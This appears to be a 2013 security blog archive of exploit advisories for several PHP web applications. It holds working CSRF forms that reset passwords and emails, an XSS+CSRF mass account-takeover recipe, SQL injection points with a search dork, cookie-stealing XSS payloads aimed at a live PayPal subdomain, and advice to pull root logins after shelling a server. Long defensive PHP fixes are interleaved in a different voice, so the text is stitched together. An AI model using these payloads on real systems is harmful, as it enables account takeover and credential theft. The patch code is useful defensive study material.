iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover

Posted by Saadi On Saturday 14 December 2013 1 comments
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScripts MultiCart is a paid shopping cart system that suffers from XSS and cross-site request forgery vulnerabilities, through which
an attacker can manipulate user data by sending the user a maliciously crafted URL.

The XSS is in the product review, so a lot of exploitation is possible, as the injected code will execute whenever the product is visited by clients.
In product_review.php, line 52 --- persistent XSS:

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."','".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is inserted without any sanitization.

Exploitation

Go to http://site.tld/product_review.php?pid=[any product id]
Paste your XSS vector and submit.

The XSS vector will be executed here:
http://site.tld/productdetails.php?productid=1 --> the same product id for which you submitted the review.
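What the fix looks like at both ends, as an added example rather than iScripts code: the insert uses bound parameters (which also closes the SQL injection in the same line), and the review is HTML-encoded at the point where productdetails.php would print it, which is what actually stops the stored XSS. The PDO handle, the function names and the length limit are assumptions; the table and column names follow the query quoted above.

```php
<?php
// Added example, not iScripts MultiCart code. Assumes a PDO connection and the
// Review table/columns from the advisory; function names are ours.
declare(strict_types=1);

/**
 * Store a review. Binding the values means a quote in the review text cannot
 * alter the statement. This alone does nothing about XSS: the text is stored
 * exactly as submitted, so the encoding has to happen on output.
 */
function saveReview(PDO $pdo, string $tablePrefix, int $userId, int $prodId, string $text, int $active): void
{
    // The prefix comes from configuration, not from the user; a strict pattern
    // still keeps a misconfigured value out of the SQL text.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tablePrefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    if (strlen($text) > 4000) {                     // assumed limit
        throw new InvalidArgumentException('review too long');
    }
    $stmt = $pdo->prepare(
        "INSERT INTO {$tablePrefix}Review (nUserId, nProdId, vDes, vActive)"
        . ' VALUES (:uid, :pid, :des, :active)'
    );
    $stmt->execute([':uid' => $userId, ':pid' => $prodId, ':des' => $text, ':active' => $active]);
}

/**
 * Encode review text for an HTML body context. ENT_QUOTES also covers the
 * attribute case, ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying
 * the string, and nl2br runs after encoding so the only tags in the output
 * are the <br /> we add ourselves. The same call is the fix for the reflected
 * cases (search terms, tags, captions) in the other posts on this page.
 */
function renderReview(string $text): string
{
    return nl2br(htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8'));
}

// Constructed sample in the shape of the payload the advisory describes; no
// database is needed for this part, so the file runs as-is.
$sample = "Great product!\n<iframe src=\"http://www.site.tld/inject.html\"></iframe>";
echo renderReview($sample), PHP_EOL;
```

The encoded string comes out as text in the page, so the iframe that the XSS+CSRF chain below relies on is never created by the browser.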

# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex" action="http://localhost/profile.php" method="post">
<input type="hidden" name="userid" value="5">
<input type="hidden" name="txtFirstName" value="admin">
<input type="hidden" name="txtLastName" value="admin">
<input type="hidden" name="txtEmail" value="admin@gmail.com">
<input type="hidden" name="txtAddress1" value="asdf">
<input type="hidden" name="txtCity" value="saf">
<input type="hidden" name="bill_country" value="DZ">
<input type="hidden" name="bill_state" value="adsf">
<input type="hidden" name="btnSaveChanges" value="Save Changes">
<input type="submit" name="btnSaveChanges" class="button" value="Save">
</form>
</body>
</html>

# XSS+CSRF Mass Email Change / Mass Account Takeover

XSS+CSRF can be used to change users' emails en masse; after changing the email we can change the password too, via the forgot-password option, by providing the email.
Just inject a CSRF iframe as the XSS vector on product_review.php,
e.g.
<iframe src="http://www.site.tld/inject.html"></iframe>
where inject.html is the CSRF exploit.

So now whenever users browse different products, their user email will be changed automatically.

#Independent Pakistani Security Researcher

PlaySMS <= 0.9.9.2 CSRF

Posted by Saadi On Monday 9 December 2013 1 comments
http://www.exploit-db.com/exploits/30177/

# Exploit Title  : PlaySMS <= 0.9.9.2 CSRF
# Date             : 2013/12/9
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link  : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

PlaySMS is an open source SMS management system that suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the user a maliciously crafted URL.

PlaySMS is not using any security token to protect against CSRF. You can manipulate any user data.
PoC and exploit to change the user password:

<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex" action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method="post" enctype="multipart/form-data">
<input type="hidden" name="up_password" value="admin">
<input type="hidden" name="up_password_conf" value="admin">
<input type="hidden" name="up_name" value="admin">
<input type="hidden" name="up_email" value="admin@gmail.com">
<input type="hidden" name="up_address" value="">
<input type="hidden" name="up_city" value="">
<input type="hidden" name="up_state" value="">
<input type="hidden" name="up_zipcode" value="">
<input type="submit" class="button" value="Save">
</form>
</body>
</html>
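The missing protection is the same in the iScripts MultiCart profile form and in the PlaySMS user_pref_save handler above, and the OpenCart, concrete5, daloRADIUS and Plogger CSRF findings further down this page share it: a state-changing POST is accepted with nothing in it that an attacker's page could not also send. The following is an added example, not code from any of those projects, of a per-session synchronizer token; it assumes PHP 7 or later (random_bytes, hash_equals) and uses an array in place of $_SESSION so that it runs on its own.

```php
<?php
// Added example, not iScripts MultiCart or PlaySMS code: a per-session
// synchronizer token that every state-changing form carries and every handler
// checks. Assumes PHP >= 7 (random_bytes, hash_equals) and that session_start()
// has run; here an array stands in for $_SESSION so the file runs on its own.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

/** Create the token once per session and return it. */
function csrfToken(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY]) || !is_string($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

/** Hidden input to place in every POST form (profile.php, user_pref_save, ...). */
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Check a submitted token before touching any data. hash_equals avoids a timing
 * side channel; the Origin check is defence in depth, since a browser attaches
 * Origin to cross-site POSTs and an attacker's page cannot change it.
 */
function csrfValid(array $session, array $post, array $server, string $ownHost): bool
{
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given = $post['csrf_token'] ?? '';
    if (!is_string($expected) || $expected === '' || !is_string($given)) {
        return false;
    }
    if (!hash_equals($expected, $given)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST) !== $ownHost) {
        return false;
    }
    return true;
}

// Constructed demonstration.
$session = [];
$formHtml = csrfField($session);            // what our own form would render
$token = $session[CSRF_SESSION_KEY];

// A submission from our own form carries the token and our Origin: accepted.
$ownForm = csrfValid($session, ['csrf_token' => $token, 'txtEmail' => 'me@example.invalid'],
                     ['HTTP_ORIGIN' => 'http://localhost'], 'localhost');

// The auto-submitting forms quoted above carry no token: rejected before the
// handler ever reads txtEmail or up_password.
$forged = csrfValid($session, ['txtEmail' => 'admin@gmail.com', 'userid' => '5'],
                    ['HTTP_ORIGIN' => 'http://attacker.invalid'], 'localhost');

// A guessed token fails too: hash_equals compares the full 64-hex string.
$guessed = csrfValid($session, ['csrf_token' => str_repeat('0', 64)], [], 'localhost');

echo 'own form: ', $ownForm ? 'accepted' : 'rejected', PHP_EOL;
echo 'forged:   ', $forged ? 'accepted' : 'rejected', PHP_EOL;
echo 'guessed:  ', $guessed ? 'accepted' : 'rejected', PHP_EOL;
```

Two design points: the token is tied to the session, so it is useless to anyone who does not already have the victim's cookie, and it must be checked on every handler that changes state, which includes logout. The concrete5 logout below is reachable with a plain GET, and a GET cannot carry this field in a way a link cannot also carry, so the fix there is to make logout a POST form with the token as well.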

#Independent Pakistani Security Researcher

Mybb Ajaxfs Plugin Sql Injection vulnerability

Posted by Saadi On Tuesday 19 November 2013 4 comments
Welcome once again :D

Today I was just browsing 1337day.com and came across an exploit titled Mybb Ajaxfs Plugin Sql Injection, which they were selling for $150.
http://1337day.com/exploit/description/21541

So I just started to pentest the plugin, and in just two minutes I found the bug.
So here are the details

Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2

The plugin is vulnerable through the tooltip and usertooltip parameters in ajaxfs.php

PoC
Code:

if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
// ...
}

if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
// ...
}

Triggering the error:
http://localhost/Upload/ajaxfs.php?usertooltip=1'
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Google DORK : inurl:ajaxfs.php
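The same two lookups with the id validated and bound, as an added example (not the Ajaxfs plugin's or MyBB's code): MyBB's $db wrapper is replaced by PDO, TABLE_PREFIX is assumed to be a configured constant as in the plugin, and an in-memory SQLite table stands in for the forum database so the file runs on its own. Because pid and uid are numeric keys, a value such as 1' is rejected before any SQL is built, and the prepared statement covers whatever gets past that check.

```php
<?php
// Added example, not the Ajaxfs plugin's code. Assumes TABLE_PREFIX is a
// configured constant (as in MyBB) and uses PDO with SQLite (needs pdo_sqlite).
declare(strict_types=1);

if (!defined('TABLE_PREFIX')) {
    define('TABLE_PREFIX', 'mybb_');     // assumed value for the demonstration
}

/**
 * Accept only a positive integer id. "1'" or "1 OR 1=1" is not a valid id,
 * so it never reaches the query at all.
 */
function parseId($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $value === false ? null : $value;
}

/** Post tooltip: bound parameter, null when the id is invalid or unknown. */
function fetchPostTooltip(PDO $pdo, $rawPid): ?array
{
    $pid = parseId($rawPid);
    if ($pid === null) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT pid, subject, message FROM ' . TABLE_PREFIX . 'posts WHERE pid = :pid');
    $stmt->execute([':pid' => $pid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** User tooltip: same pattern. */
function fetchUserTooltip(PDO $pdo, $rawUid): ?array
{
    $uid = parseId($rawUid);
    if ($uid === null) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT uid, username FROM ' . TABLE_PREFIX . 'users WHERE uid = :uid');
    $stmt->execute([':uid' => $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demonstration data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ' . TABLE_PREFIX . 'users (uid INTEGER PRIMARY KEY, username TEXT)');
$pdo->exec('CREATE TABLE ' . TABLE_PREFIX . 'posts (pid INTEGER PRIMARY KEY, subject TEXT, message TEXT)');
$pdo->exec("INSERT INTO " . TABLE_PREFIX . "users VALUES (1, 'alice')");
$pdo->exec("INSERT INTO " . TABLE_PREFIX . "posts VALUES (1, 'hello', 'first post')");

var_dump(fetchUserTooltip($pdo, '1'));        // a well-formed id
var_dump(fetchUserTooltip($pdo, "1'"));       // the advisory's probe: fails validation, no SQL runs
var_dump(fetchPostTooltip($pdo, '1 OR 1=1')); // likewise
```

The 1064 error shown above is itself worth removing: with display_errors off and the database error logged server-side, a probe like usertooltip=1' gives the attacker no feedback about the query shape.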
#Independent Pakistani Security Researcher


WHMCS <=5.2.12 PHP Object Injection

Posted by Saadi On Saturday 2 November 2013 4 comments
Hi all, I was a lot busy with my work, so now here comes some new stuff: PHP object injection in all WHMCS versions.

http://packetstormsecurity.com/files/123890/whmcs-phpobject.txt
http://blog.whmcs.com/?t=81138
http://www.securelist.com/en/advisories/55717


# Exploit Title  : WHMCS <=5.2.12 PHP Object Injection
#                : Web Host Manager Complete Solution
# Date           : 2013/10/24
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link  : http://www.whmcs.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#PHP Object Injection

#Affected Versions:
WHMCS <=5.2.12

#Vulnerability Description
Poc

The vulnerable code is located in /includes/classes/class.admin.php
The function sortableTableInit() passes $_COOKIE data to the unserialize function without sanitizing it.
Code on line 711:

$sortdata = (isset( $_COOKIE["sortdata"] ) ? $_COOKIE["sortdata"] : "");
$sortdata = unserialize( base64_decode( $sortdata ) );

User input passed through the cookies is not properly sanitized before being used in
an unserialize() call at line 711. This can be exploited to inject arbitrary PHP objects into the
application scope.

Some of the files which call sortableTableInit() are:

/admin/configticketescalations.php
/admin/clientsinvoices.php
/admin/transactions.php
/admin/clientsnotes.php
/admin/affiliates.php
/admin/offlineccprocessing.php
/admin/supportannouncements.php
/admin/supporttickets.php
/admin/systemmailimportlog.php
/admin/clientscredits.php
/admin/clientsquotes.php
/admin/configservers.php
/admin/systemactivitylog.php
/admin/clientslog.php
/admin/clientstransactions.php
/admin/quotes.php
/admin/gatewaylog.php
/admin/systemadminlog.php
/admin/clientsservices.php
/admin/configadmins.php
/admin/todolist.php
/admin/invoices.php
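Sanitizing the cookie is the wrong framing here: the problem is the deserializer, which will instantiate any class the attacker names. The following is an added example, not WHMCS code, of the two defensive options: carry the sort preference in JSON (which has no object notion at all) and validate its shape, and, if old serialized cookies must still be read during a migration, call unserialize() with allowed_classes set to false (PHP 7.0+) so no class can be instantiated. The cookie name and its base64 wrapping are from the advisory; the JSON layout, the column allow-list and the function names are assumptions.

```php
<?php
// Added example, not WHMCS code. The cookie name "sortdata" and its base64 wrapping
// are taken from the advisory; the JSON layout, the column allow-list and the
// function names are assumptions.
declare(strict_types=1);

const SORT_COLUMNS = ['id', 'date', 'status', 'total'];   // assumed allow-list

/**
 * Decode sort preferences from an untrusted cookie. JSON has no notion of PHP
 * objects, so json_decode() can never trigger a __wakeup()/__destruct() gadget
 * the way unserialize() can; with assoc=true it returns plain arrays only. The
 * shape is then checked field by field and anything unexpected becomes the default.
 */
function decodeSortData(?string $cookie): array
{
    $default = ['column' => 'id', 'direction' => 'asc'];
    if ($cookie === null || $cookie === '' || strlen($cookie) > 256) {
        return $default;
    }
    $raw = base64_decode($cookie, true);       // strict mode rejects non-base64 input
    if ($raw === false) {
        return $default;
    }
    $data = json_decode($raw, true, 3);        // small depth bound: a flat object is all we accept
    if (!is_array($data)) {
        return $default;
    }
    $column = $data['column'] ?? null;
    $direction = $data['direction'] ?? null;
    if (!in_array($column, SORT_COLUMNS, true) || !in_array($direction, ['asc', 'desc'], true)) {
        return $default;
    }
    return ['column' => $column, 'direction' => $direction];
}

/** Produce the cookie value we hand out; it always round-trips through decodeSortData(). */
function encodeSortData(string $column, string $direction): string
{
    return base64_encode(json_encode(['column' => $column, 'direction' => $direction]));
}

/**
 * If cookies written by the old serialize() code must still be honoured during a
 * migration, PHP 7.0+ can at least refuse to instantiate classes; the result is
 * then pushed through the same validation as the JSON path.
 */
function decodeLegacySortData(string $cookie): array
{
    $raw = base64_decode($cookie, true);
    $data = $raw === false ? false : @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return decodeSortData(null);
    }
    $column = is_string($data['column'] ?? null) ? $data['column'] : '';
    $direction = is_string($data['direction'] ?? null) ? $data['direction'] : '';
    return decodeSortData(encodeSortData($column, $direction));
}

// Constructed demonstration.
var_dump(decodeSortData(encodeSortData('date', 'desc')));

// A serialized object (the class of payload the advisory is about) is not JSON,
// so the new decoder returns the default without instantiating anything; the
// legacy decoder receives an incomplete-class stub instead of an array and does the same.
$hostile = base64_encode('O:8:"stdClass":0:{}');
var_dump(decodeSortData($hostile));
var_dump(decodeLegacySortData($hostile));
```

The allow-list on column and direction matters independently of the deserialization fix: a sort column that ends up in an ORDER BY clause is an identifier, and identifiers cannot be protected by a prepared statement.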


#Independent Pakistani Security Researcher

OpenCart Latest Version CSRF

Posted by Saadi On Thursday 4 April 2013 23 comments
Hi, for the last few days I was pentesting OpenCart, a shopping cart system.

www.opencart.com

And found the OpenCart latest version is vulnerable to CSRF inside the user panel.
You can edit the user password and all that stuff.

So I wrote the final description of the vulnerability and sent it to the exploit database sources.
The next day I got a reply from the PacketStormSecurity team that OpenCart CSRF was already reported to them previously, and they sent me the link.
What I found was that it was discovered in old versions and reported in 2010.
Ahhh... now this is quite embarrassing that the latest version is still vulnerable :(

I again set up the latest version and found it is still vulnerable...
I don't know why this vulnerability has not been patched by the OpenCart development team, as it was already reported by different security researchers.

OK, so here is the exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/


# Exploit Title  : OpenCart CSRF
# Date           : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link  : http://www.opencart.com/index.php?route=download/download
#                : https://github.com/opencart
# Software web   : www.opencart.com
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

OpenCart is an open source shopping cart system that suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the user a maliciously crafted URL.

OpenCart is not using any security token to protect against CSRF.
It is vulnerable at all locations inside the user panel.

Header

----------------------------------------------------------
http://localhost/index.php?route=account/password

POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"

123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"

123456789
-----------------------------2465524120551--

Response

HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------

Simple PoC to change the user password

<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">

    <div class="content">
      <table class="form">
        <tbody><tr>
     
          <td><input name="password" value="987654321" type="hidden">
            </td>
        </tr>
        <tr>
       
          <td><input name="confirm" value="987654321" type="hidden">
            </td>
        </tr>
      </tbody></table>
    </div>
    <div class="buttons">
 
      <div class="right"><input value="Continue" class="button" type="submit"></div>
    </div>
  </form>

Edit: OpenCart <= 1.5.6.1 SQL Injection

#Independent Pakistani Security Researcher



OpenCart Local Path Disclose - LPD

Posted by Saadi On Saturday 30 March 2013 3 comments
Hi, today OpenCart.
I just set up OpenCart to give it a pen-test and here are the initial results.

OK, the bug

OpenCart discloses the local path of the server in many locations. Some of them are:

http://localhost/opencart/upload/catalog/controller/account/address.php

http://localhost/opencart/upload/catalog/controller/account/account.php

http://localhost/opencart/upload/catalog/controller/account/order.php . . .etc

Live Demo

OpenCart Own Domain

http://demo.opencart.com/catalog/controller/account/address.php

http://spotonsolutions.net/catalog/controller/account/address.php




How this issue arises, and patching

When you include different PHP files from one file, declaring some variable/function in the first file and using that variable/function in the second file you include, then if anyone accesses that second file directly they will get errors like:
Undefined variable...
Class not found, and so on.

Say we have index.php with the code

include('1.php');
include('2.php');

Code of 1.php

class a {
public $count = 0;
}

Code of 2.php

$classs = new a();


Now, as you can see, if you access 2.php directly you will get the error

Class 'a' not found.
because class a is defined in 1.php.

But if you access index.php
it will work perfectly, as
class a is in 1.php and then 2.php uses that class.

So this is how LPD occurs many times.

Patching
Simplest patch:
turn error reporting off.

Or

You can also do it with .htaccess:
Order deny,allow
Deny from all


Or

You can do this:
just define a constant in index.php, or in whichever file is going to include 1.php and 2.php,
like

if (!defined('direct access')) {
    define('direct access', true);
}

and then just add this at the top of 1.php and 2.php

defined('direct access') or die("Access Denied.");

What it does is simple: the main file defines a constant and the included files check whether that constant is defined. As you already defined it in the main file, it will run perfectly.
But if you access directly those files that are included in the main file, they check whether the constant is defined, and when the file is accessed directly the constant will not be defined, so it goes into die, showing you "Access Denied".

So this is for today..

# Independent Pakistani Security Researcher

 



Concrete Latest Version 5.6.1.2 CSRF--Logout and Persistent XSS

Posted by Saadi On Tuesday 26 March 2013 3 comments
Hi, today concrete5.

Concrete5 is a famous content management system.
For more:
www.concrete5.org

So I was just pen-testing it a bit and initially found that it is not using any security token to protect against
logging admins/users out (CSRF).

http://localhost/concrete/index.php/login/logout/
In simple terms, just by sending this link to any user who has a valid session, they will be logged out.
Header:
GET http://localhost/concrete/index.php/login/logout/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: CONCRETE5=garsp3c29rflks37hk16jda510
Connection: keep-alive



OK, the XSS
I found an XSS inside the admin panel, but still, everything should be secure.
Bug

Concrete5 is not sanitizing the user input of the POST field for tags.
When you are writing a post to publish on the blog there is an option to enter the TAG for the post.
So this POST field is vulnerable to XSS.

Go to Write Post inside the admin panel, then just enter any XSS vector in the TAG field and you will get the result.
And it is stored/persistent XSS.



So this is for today.

#independent Pakistani Security Researcher


Free Hosting Manager V 2.0.2 Multiple SQLi

Posted by Saadi On Saturday 23 March 2013 2 comments
Hi, for today Free Hosting Manager. Free Hosting Manager is a free script to install and run your hosting.
It includes clients registering there and then ordering hosting, and so on. So the script is highly vulnerable, plus if you successfully upload a shell or have server access you can symlink to get the root WHM logins.

Free Hosting Manager stores root logins in config.php.
So if you shell it you should check config.php for root logins.

Exploit Links

http://www.exploit-db.com/exploits/24879

http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html

http://1337day.com/exploit/20555

Exploit Details
-------------------------------------------------------------------------

# Software      : Free Hosting Manager V2.0.2    Multiple SQLi
# Author        : Saadat Ullah , saadi_linux@rocketmail.com
# Author home   : http://security-geeks.blogspot.com
# Date          : 23/3/13
# Vendors       : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php

-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
It is vulnerable to SQLi in many files; some of them are:

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST fields.

Proof of Concept
In home.php
a function auth() is called, and this is what it is:

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")

It only uses stripslashes, which will not protect against SQL injection attacks.
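Beyond the missing escaping, the auth() excerpt above shows a design flaw that stripslashes could never fix: the username, password and client id are all read back from cookies the browser controls, so the "authentication" is whatever the client asserts. The following is an added example, not Free Hosting Manager code, of the shape that avoids both problems: credentials are checked once at login with password_verify(), only the client id is kept in the server-side session, and every query value is bound. Table and column names follow the advisory; hashed passwords and an in-memory SQLite database are assumptions so that the file runs stand-alone.

```php
<?php
// Added example, not Free Hosting Manager code. The cookie-based auth() above
// trusts clientuser/clientpass/clientid straight from the browser and interpolates
// them into SQL. This replacement keeps only the PHP session id in a cookie, stores
// the client id server-side after password_verify(), and binds every query value.
// Table/column names follow the advisory; hashed passwords are an assumption.
declare(strict_types=1);

/**
 * Authenticate once, at login. The username is bound, so "' OR '1'='1" is merely
 * an unknown username. Returns the client id on success, null otherwise.
 */
function loginClient(PDO $pdo, string $username, string $password): ?int
{
    $stmt = $pdo->prepare('SELECT id, password FROM clients WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        password_hash('dummy', PASSWORD_DEFAULT);   // spend similar time for unknown users
        return null;
    }
    if (!password_verify($password, (string)$row['password'])) {
        return null;
    }
    return (int)$row['id'];
}

/** What auth() used to read from cookies is now read from the server-side session only. */
function currentClientId(array $session): ?int
{
    $id = $session['clientid'] ?? null;
    return is_int($id) && $id > 0 ? $id : null;
}

/** A per-client lookup in the style of viewaccount.php, with both values bound. */
function fetchOrder(PDO $pdo, int $clientId, $rawOrderId): ?array
{
    $orderId = filter_var($rawOrderId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($orderId === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, clientid, plan FROM orders WHERE id = :id AND clientid = :cid');
    $stmt->execute([':id' => $orderId, ':cid' => $clientId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demonstration on an in-memory SQLite database (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE clients (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec('CREATE TABLE orders (id INTEGER PRIMARY KEY, clientid INTEGER, plan TEXT)');
$ins = $pdo->prepare('INSERT INTO clients (id, username, password) VALUES (1, :u, :p)');
$ins->execute([':u' => 'alice', ':p' => password_hash('correct horse', PASSWORD_DEFAULT)]);
$pdo->exec("INSERT INTO orders VALUES (10, 1, 'basic'), (11, 2, 'pro')");

$session = [];                                   // stands in for $_SESSION
$id = loginClient($pdo, 'alice', 'correct horse');
if ($id !== null) {
    // In a real request: session_regenerate_id(true) here, then store the id.
    $session['clientid'] = $id;
}
$me = currentClientId($session);
var_dump($me);                                                 // alice's own id
var_dump(loginClient($pdo, "' OR '1'='1", 'anything'));        // bound: just an unknown user
var_dump($me === null ? null : fetchOrder($pdo, $me, '10'));   // alice's order
var_dump($me === null ? null : fetchOrder($pdo, $me, '11'));   // belongs to client 2
```

Keeping the client id out of the cookie also removes the horizontal privilege issue implicit in the original: with clientid supplied by the browser, the AND clientid= condition in the ticket and order queries restricts nothing.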

#independent Pakistani Security Researcher

Bug Bounty Paypal -- No luck :)

Posted by Saadi On 2 comments
Hi, some days ago I found an XSS bug in PayPal services but was not eligible to get the bounty. Well, no worries, will try again :D ...

It was a subdomain of billmelater.com

The bug can be used for things like phishing attacks etc.
domain: http://wwwb.search.billmelater.com

They are getting an integer value from the GET field and using it as the time to redirect you to other pages.

Vuln Link  :
 http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>

 http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>

Screenshot (image not preserved in this copy)

So this is for today  :)
